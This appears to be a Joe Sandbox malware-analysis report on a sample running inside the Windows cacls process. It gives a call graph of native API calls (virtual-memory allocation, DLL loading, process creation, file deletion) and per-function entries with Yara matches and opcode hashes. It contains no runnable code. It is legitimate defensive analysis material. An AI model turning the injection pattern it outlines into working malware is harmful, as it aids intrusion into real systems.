2cf8d90 99888->99885 99889 2cf8e50 99890 2cf8e6a 99889->99890 99893 3582df0 LdrInitializeThunk 99890->99893 99891 2cf8e92 99893->99891 99894 2cf6410 99895 2cf646a 99894->99895 99897 2cf6477 99895->99897 99898 2cf3e10 99895->99898 99899 2cfb8d0 NtAllocateVirtualMemory 99898->99899 99900 2cf3e51 99899->99900 99901 2ce4890 LdrLoadDll 99900->99901 99904 2cf3f5e 99900->99904 99903 2cf3e97 99901->99903 99902 2cf3ee0 Sleep 99902->99903 99903->99902 99903->99904 99904->99897 99905 2cf97d0 99906 2cf9847 99905->99906 99908 2cf97fb 99905->99908 99907 2cf985d NtDeleteFile 99906->99907 99909 2cf1b10 99910 2cf1b2c 99909->99910 99911 2cf1b68 99910->99911 99912 2cf1b54 99910->99912 99914 2cf9870 NtClose 99911->99914 99913 2cf9870 NtClose 99912->99913 99916 2cf1b5d 99913->99916 99915 2cf1b71 99914->99915 99919 2cfba80 RtlAllocateHeap 99915->99919 99918 2cf1b7c 99919->99918 99921 2cdb7e0 99922 2cfb8d0 NtAllocateVirtualMemory 99921->99922 99923 2cdce51 99922->99923 99924 2ce10a0 99925 2ce10ba 99924->99925 99926 2ce4890 LdrLoadDll 99925->99926 99927 2ce10d8 99925->99927 99926->99927 99928 2ce110c PostThreadMessageW 99927->99928 99929 2ce111d 99927->99929 99928->99929 99930 2ce7660 99931 2ce7678 99930->99931 99933 2ce76d2 99930->99933 99931->99933 99934 2ceb5d0 99931->99934 99935 2ceb5f6 99934->99935 99936 2ceb829 99935->99936 99961 2cf9c70 99935->99961 99936->99933 99938 2ceb66c 99938->99936 99939 2cfcb30 2 API calls 99938->99939 99940 2ceb68b 99939->99940 99940->99936 99941 2ceb762 99940->99941 99942 2cf8ea0 LdrInitializeThunk 99940->99942 99944 2ce5e80 LdrInitializeThunk 99941->99944 99945 2ceb781 99941->99945 99943 2ceb6ed 99942->99943 99943->99941 99949 2ceb6f6 99943->99949 99944->99945 99950 2ceb811 99945->99950 99967 2cf8a10 99945->99967 99946 2ceb74a 99947 2ce8450 LdrInitializeThunk 99946->99947 99951 2ceb758 99947->99951 99948 2ceb728 99982 2cf4b20 LdrInitializeThunk 99948->99982 99949->99936 99949->99946 99949->99948 99964 2ce5e80 99949->99964 99952 2ce8450 LdrInitializeThunk 99950->99952 99951->99933 99956 2ceb81f 99952->99956 99956->99933 99957 2ceb7e8 99972 2cf8ac0 99957->99972 99959 2ceb802 99977 2cf8c20 99959->99977 99962 2cf9c8a 99961->99962 99963 2cf9c9b CreateProcessInternalW 99962->99963 99963->99938 99965 2cf9070 LdrInitializeThunk 99964->99965 99966 2ce5ebe 99965->99966 99966->99948 99968 2cf8a8d 99967->99968 99970 2cf8a3b 99967->99970 99983 35839b0 LdrInitializeThunk 99968->99983 99969 2cf8ab2 99969->99957 99970->99957 99973 2cf8b40 99972->99973 99975 2cf8aee 99972->99975 99984 3584340 LdrInitializeThunk 99973->99984 99974 2cf8b65 99974->99959 99975->99959 99978 2cf8ca0 99977->99978 99980 2cf8c4e 99977->99980 99985 3582fb0 LdrInitializeThunk 99978->99985 99979 2cf8cc5 99979->99950 99980->99950 99982->99946 99983->99969 99984->99974 99985->99979 99986 2cefba0 99987 2cefc04 99986->99987 99988 2ce6610 2 API calls 99987->99988 99989 2cefd37 99988->99989 99990 2cefd3e 99989->99990 100015 2ce6720 99989->100015 99992 2cefee3 99993 2cefdba 99993->99992 99994 2cefef2 99993->99994 100019 2cef980 99993->100019 99996 2cf9870 NtClose 99994->99996 99998 2cefefc 99996->99998 99997 2cefdf6 99997->99994 99999 2cefe01 99997->99999 100000 2cfba40 RtlAllocateHeap 99999->100000 100001 2cefe2a 100000->100001 100002 2cefe49 100001->100002 100003 2cefe33 100001->100003 100028 2cef870 CoInitialize 100002->100028 100004 2cf9870 NtClose 100003->100004 100006 2cefe3d 100004->100006 100007 2cefe57 100031 2cf9310 100007->100031 100009 2cefed2 100010 2cf9870 NtClose 100009->100010 100011 2cefedc 100010->100011 100012 2cfb960 RtlFreeHeap 100011->100012 100012->99992 100013 2cefe75 100013->100009 100014 2cf9310 LdrInitializeThunk 100013->100014 100014->100013 100016 2ce6745 100015->100016 100035 2cf91c0 100016->100035 100020 2cef99c 100019->100020 100021 2ce4890 LdrLoadDll 100020->100021 100023 2cef9ba 100021->100023 100022 2cef9c3 100022->99997 100023->100022 100024 2ce4890 LdrLoadDll 100023->100024 100025 2cefa8e 100024->100025 100026 2ce4890 LdrLoadDll 100025->100026 100027 2cefae8 100025->100027 100026->100027 100027->99997 100029 2cef8d5 100028->100029 100030 2cef96b CoUninitialize 100029->100030 100030->100007 100032 2cf932d 100031->100032 100040 3582ba0 LdrInitializeThunk 100032->100040 100033 2cf935d 100033->100013 100036 2cf91da 100035->100036 100039 3582c60 LdrInitializeThunk 100036->100039 100037 2ce67b9 100037->99993 100039->100037 100040->100033 100041 2cf1ea0 100042 2cf1eb9 100041->100042 100043 2cf1f46 100042->100043 100044 2cf1f01 100042->100044 100047 2cf1f41 100042->100047 100045 2cfb960 RtlFreeHeap 100044->100045 100046 2cf1f11 100045->100046 100048 2cfb960 RtlFreeHeap 100047->100048 100048->100043 100049 2cf04a0 100050 2cf04c3 100049->100050 100051 2ce4890 LdrLoadDll 100050->100051 100052 2cf04e7 100051->100052 100053 2cfca60 100054 2cfb960 RtlFreeHeap 100053->100054 100055 2cfca75 100054->100055 100056 2cf9560 100057 2cf961a 100056->100057 100059 2cf9592 100056->100059 100058 2cf9630 NtCreateFile 100057->100058 100060 2ce8b3b 100061 2ce8b45 100060->100061 100063 2ce8ab6 100061->100063 100064 2ce7400 100061->100064 100065 2ce7416 100064->100065 100067 2ce744f 100064->100067 100065->100067 100068 2ce7270 LdrLoadDll 100065->100068 100067->100063 100068->100067 100071 2cd9df0 100073 2cd9dff 100071->100073 100072 2cd9e40 100073->100072 100074 2cd9e2d CreateThread 100073->100074

                                                                                                              Executed Functions

                                                                                                              Function 02CD9E50 Relevance: 26.6, Strings: 21, Instructions: 395COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 27 2cd9e50-2cda0c8 28 2cda0d2-2cda0d9 27->28 29 2cda0db-2cda0fb 28->29 30 2cda125-2cda12c 28->30 33 2cda0fd-2cda101 29->33 34 2cda102-2cda104 29->34 31 2cda15e-2cda16f 30->31 32 2cda12e-2cda15c 30->32 35 2cda180-2cda18a 31->35 32->30 33->34 36 2cda10f-2cda123 34->36 37 2cda106-2cda10c 34->37 38 2cda18c-2cda19f 35->38 39 2cda1a1-2cda1a8 35->39 36->28 37->36 38->35 41 2cda1c9-2cda1d3 39->41 42 2cda1aa-2cda1c7 39->42 43 2cda1e4-2cda1f0 41->43 42->39 44 2cda206-2cda210 43->44 45 2cda1f2-2cda204 43->45 47 2cda248-2cda261 44->47 48 2cda212-2cda22c 44->48 45->43 47->47 49 2cda263 47->49 50 2cda22e-2cda232 48->50 51 2cda233-2cda235 48->51 52 2cda26a-2cda274 49->52 50->51 53 2cda237-2cda240 51->53 54 2cda246 51->54 55 2cda2ad-2cda2be 52->55 56 2cda276-2cda291 52->56 53->54 54->44 59 2cda2cf-2cda2db 55->59 57 2cda298-2cda29a 56->57 58 2cda293-2cda297 56->58 60 2cda29c-2cda2a5 57->60 61 2cda2ab 57->61 58->57 62 2cda2dd-2cda2ea 59->62 63 2cda2ec-2cda2f5 59->63 60->61 61->52 62->59 65 2cda2fb-2cda305 63->65 66 2cda4f0-2cda4fa 63->66 68 2cda316-2cda320 65->68 67 2cda50b-2cda517 66->67 71 2cda519-2cda525 67->71 72 2cda527-2cda537 67->72 69 2cda36e-2cda381 68->69 70 2cda322-2cda36c 68->70 73 2cda392-2cda39b 69->73 70->68 71->67 72->72 76 2cda539-2cda540 72->76 77 2cda39d-2cda3a9 73->77 78 2cda3b9-2cda3bd 73->78 79 2cda546-2cda54d 76->79 80 2cda612-2cda61b 76->80 81 2cda3ab-2cda3b1 77->81 82 2cda3b7 77->82 84 2cda3bf-2cda3e4 78->84 85 2cda3e6-2cda3f5 78->85 83 2cda558-2cda55f 79->83 81->82 82->73 87 2cda59e call 2cfb5a0 83->87 88 2cda561-2cda59c 83->88 84->78 89 2cda3fb-2cda405 85->89 90 2cda4e1-2cda4eb 85->90 94 2cda5a3-2cda5ad 87->94 91 2cda54f-2cda555 88->91 93 2cda416-2cda41f 89->93 90->63 91->83 95 2cda42f-2cda439 93->95 96 2cda421-2cda42d 93->96 98 2cda5be-2cda5c7 94->98 97 2cda44a-2cda456 95->97 96->93 100 2cda458-2cda461 97->100 101 2cda463-2cda46d 97->101 102 2cda5c9-2cda5d2 98->102 103 2cda5d4-2cda5de 98->103 100->97 106 2cda46f-2cda489 101->106 107 2cda4a5-2cda4af 101->107 102->98 104 2cda5ef-2cda5fb 103->104 104->80 109 2cda5fd-2cda610 104->109 110 2cda48b-2cda48f 106->110 111 2cda490-2cda492 106->111 112 2cda4c0-2cda4c9 107->112 109->104 110->111 114 2cda494-2cda49d 111->114 115 2cda4a3 111->115 116 2cda4df 112->116 117 2cda4cb-2cda4dd 112->117 114->115 115->101 116->66 117->112
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: "n$)t$,$/a$8n$=G$@$B`$PY$Pq$Yu$Z4$jJ$m@$p$us$x`$z)$z`$q$~
                                                                                                              • API String ID: 0-299318214
                                                                                                              • Opcode ID: 3d6d2a7bf567a0c0f251756bac415fa3dd12f0075b81f000199c5c1cc8754ae8
                                                                                                              • Instruction ID: 0cbfe349b7334380acb2ddd2d165928e47e8557837996628b502eef4d98890b2
                                                                                                              • Opcode Fuzzy Hash: 3d6d2a7bf567a0c0f251756bac415fa3dd12f0075b81f000199c5c1cc8754ae8
                                                                                                              • Instruction Fuzzy Hash: BF22C2B0D05629CFEB24CF45C894BDDBBB2BB44308F1081D9C64DAB280DB756A89DF65
                                                                                                              Function 02CEC940 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 02CECA24
                                                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 02CECA5F
                                                                                                              • FindClose.KERNELBASE(?), ref: 02CECA6A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 3541575487-0
                                                                                                              • Opcode ID: 9d27a8dcd305fc1bab0a29c7ea9d517702547bd46d60a9d6759da10dfb66ff6c
                                                                                                              • Instruction ID: df43f4fc9e7215c7d7a38536b8666edb91b493fdf648533fcfc29ea34cb1cf22
                                                                                                              • Opcode Fuzzy Hash: 9d27a8dcd305fc1bab0a29c7ea9d517702547bd46d60a9d6759da10dfb66ff6c
                                                                                                              • Instruction Fuzzy Hash: CE317271A40308BBDF60DFA4CC85FEF777D9F84B44F144559BA19A6180DBB0AB849BA0
                                                                                                              Function 02CF9560 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtCreateFile.NTDLL(?,?,?,C3714B7A,?,?,?,?,?,?,?), ref: 02CF9661
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: e3c55a6a012d0c960e2372c45c7d93e030ed8fa0c9b77380962c01b5fbf43196
                                                                                                              • Instruction ID: 7d9a02e318501ded4be8b50f9540f14f6648680ae47259fc96c4ad3162014d53
                                                                                                              • Opcode Fuzzy Hash: e3c55a6a012d0c960e2372c45c7d93e030ed8fa0c9b77380962c01b5fbf43196
                                                                                                              • Instruction Fuzzy Hash: 9A31C2B5A01248ABDB54DF98D880EEFB7F9AF8C304F108219F909A7240D770A951CFA4
                                                                                                              Function 02CF96D0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtReadFile.NTDLL(?,?,?,C3714B7A,?,?,?,?,?), ref: 02CF97B9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2738559852-0
                                                                                                              • Opcode ID: d26101aeaaa043df99420354c37e34887d72040b686b126e709cff6c41da8d29
                                                                                                              • Instruction ID: ddc50993487c3158a2d8a26c917e37c1e87071e5d38fa626fe255ca8663b51bc
                                                                                                              • Opcode Fuzzy Hash: d26101aeaaa043df99420354c37e34887d72040b686b126e709cff6c41da8d29
                                                                                                              • Instruction Fuzzy Hash: 4131E5B5A00208AFDB54DF98D880EEFB7F9EF8C314F108219F919A7240D770A9118FA1
                                                                                                              Function 02CF99D0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtAllocateVirtualMemory.NTDLL(02CE209E,?,02CF834F,C3714B7A,00000004,00003000,?,?,?,?,?,02CF834F,02CE209E,02CFB901,02CF834F,520F8B51), ref: 02CF9A98
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2167126740-0
                                                                                                              • Opcode ID: ce89629044f2441d048d03dcdc22383d650bc2c2de4880009a5b8edf100d122a
                                                                                                              • Instruction ID: 276398b6005a0ab218b29623e1829d9e9cc84665afb4073b31720a7ac9194cf9
                                                                                                              • Opcode Fuzzy Hash: ce89629044f2441d048d03dcdc22383d650bc2c2de4880009a5b8edf100d122a
                                                                                                              • Instruction Fuzzy Hash: 3921E8B5A00609ABDB54DF98DC41FEFB7B9EF88710F108219FA19A7240D770A911CFA5
                                                                                                              Function 02CF97D0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DeleteFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033686569-0
                                                                                                              • Opcode ID: 954619f73f159c906b658b08830aa2f3d9ebf4970ffdbfa5db3952952fb91dc1
                                                                                                              • Instruction ID: 376b22ae81696b8f245b999c15411075baa5da1678e7c23b0b8018a8ea003971
                                                                                                              • Opcode Fuzzy Hash: 954619f73f159c906b658b08830aa2f3d9ebf4970ffdbfa5db3952952fb91dc1
                                                                                                              • Instruction Fuzzy Hash: 8F119171600208ABD760EAA8CC41FEBB7ADDF85714F108109FA0956180D7B17A158FE1
                                                                                                              Function 02CF9870 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,02CE3443,001F0001,?,00000000,?,?,00000104), ref: 02CF98A4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                                              • Instruction ID: 829bebba8803aec0a05c3aa86350e57140e3f1f0047d939d649d0f9f8973cdd4
                                                                                                              • Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                                              • Instruction Fuzzy Hash: F7E046362102187BC220BA69DC00FDBB7ADEBC5760F008415FA0CA7241CAB0BA518BE0
                                                                                                              Function 03584340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 4c835c818ec0c59e2b0edad9d93b517ac44a529032b69ae246f694281c7cdf10
                                                                                                              • Instruction ID: e78fc805eb3a1ff7b259a08f45f65a50001f4fee415b6dfa5fd377b8cbedae6f
                                                                                                              • Opcode Fuzzy Hash: 4c835c818ec0c59e2b0edad9d93b517ac44a529032b69ae246f694281c7cdf10
                                                                                                              • Instruction Fuzzy Hash: 6A90023170580412A540B15858845464045A7E1311B59C012E4428555C8B148A565365
                                                                                                              Function 03584650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: ad1f30869c1443536922f671cd8a7b244c63f12914ca1daeae14300550ac0dbb
                                                                                                              • Instruction ID: ea5bc3e737f180f4a32a4b833f751c1bc1324cf1e5fab71bba7629704b3e2e65
                                                                                                              • Opcode Fuzzy Hash: ad1f30869c1443536922f671cd8a7b244c63f12914ca1daeae14300550ac0dbb
                                                                                                              • Instruction Fuzzy Hash: 08900261701504425540B15858044066045A7E2311399C116A4558561C87188955926D
                                                                                                              Function 03582B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: e0ce90cb0b584c13e48d7383a449eb6d0b5585906753d4962948b4a390f1b279
                                                                                                              • Instruction ID: d89e7cb4962880ed560362ea2a8aa0dac1defd00860fa24b542f3e9f87bc7a5c
                                                                                                              • Opcode Fuzzy Hash: e0ce90cb0b584c13e48d7383a449eb6d0b5585906753d4962948b4a390f1b279
                                                                                                              • Instruction Fuzzy Hash: 06900261302404035505B1585414616404A97E1211B59C022E5018591DC62589916129
                                                                                                              Function 03582BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 985e8b88a9c7e585b3c03c7437f33f9a754561b8bc0f173da72bd94b3ee6c623
                                                                                                              • Instruction ID: 59a5d426e47d4671635a9620c984ce9457a625819e330f6c45bbbf3516d31434
                                                                                                              • Opcode Fuzzy Hash: 985e8b88a9c7e585b3c03c7437f33f9a754561b8bc0f173da72bd94b3ee6c623
                                                                                                              • Instruction Fuzzy Hash: 3F90023130140C02E580B158540464A004597D2311F99C016A4029655DCB158B5977A5
                                                                                                              Function 03582BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: c85754637973cd24f872f1073e304832b144a393f9b015a4ca5f6520809a694d
                                                                                                              • Instruction ID: aee8dcb8b707394a5300899977758a31db5bc04234b37dc22127e3a60c9ee79a
                                                                                                              • Opcode Fuzzy Hash: c85754637973cd24f872f1073e304832b144a393f9b015a4ca5f6520809a694d
                                                                                                              • Instruction Fuzzy Hash: 0390023130544C42E540B1585404A46005597D1315F59C012A4068695D97258E55B665
                                                                                                              Function 03582BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: bc6193edef593a326a3bbe3d8cc402fac8fa85dc495f1e8ef4bfc731e678a548
                                                                                                              • Instruction ID: 5ffc429301a86cf432ba1fdc5ba2d31c7574d387c1954c0216285e653b00e6fa
                                                                                                              • Opcode Fuzzy Hash: bc6193edef593a326a3bbe3d8cc402fac8fa85dc495f1e8ef4bfc731e678a548
                                                                                                              • Instruction Fuzzy Hash: 8F90023170540C02E550B1585414746004597D1311F59C012A4028655D87558B5576A5
                                                                                                              Function 03582AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 135ffeddac42ee2985fe4f4714b9417e51cf5f357656f999efe67cf5b2de1837
                                                                                                              • Instruction ID: 2d66f69aeacd942a41a46c95cad86eff08932dd150de36d36777c3eb5bc9be27
                                                                                                              • Opcode Fuzzy Hash: 135ffeddac42ee2985fe4f4714b9417e51cf5f357656f999efe67cf5b2de1837
                                                                                                              • Instruction Fuzzy Hash: B5900435311404031505F55C170450700C7D7D737135DC033F501D551CD731CD715135
                                                                                                              Function 03582AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 114bc31a1b1e23ccc959cdd3d9de9a45a99f3d97264bb6a1b3b4c63a34af576a
                                                                                                              • Instruction ID: 7b01b94e31f6a735f188d62515a672297728734821b0bd1c9698377692167efe
                                                                                                              • Opcode Fuzzy Hash: 114bc31a1b1e23ccc959cdd3d9de9a45a99f3d97264bb6a1b3b4c63a34af576a
                                                                                                              • Instruction Fuzzy Hash: 24900225321404021545F558160450B0485A7D7361399C016F541A591CC72189655325
                                                                                                              Function 03582F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
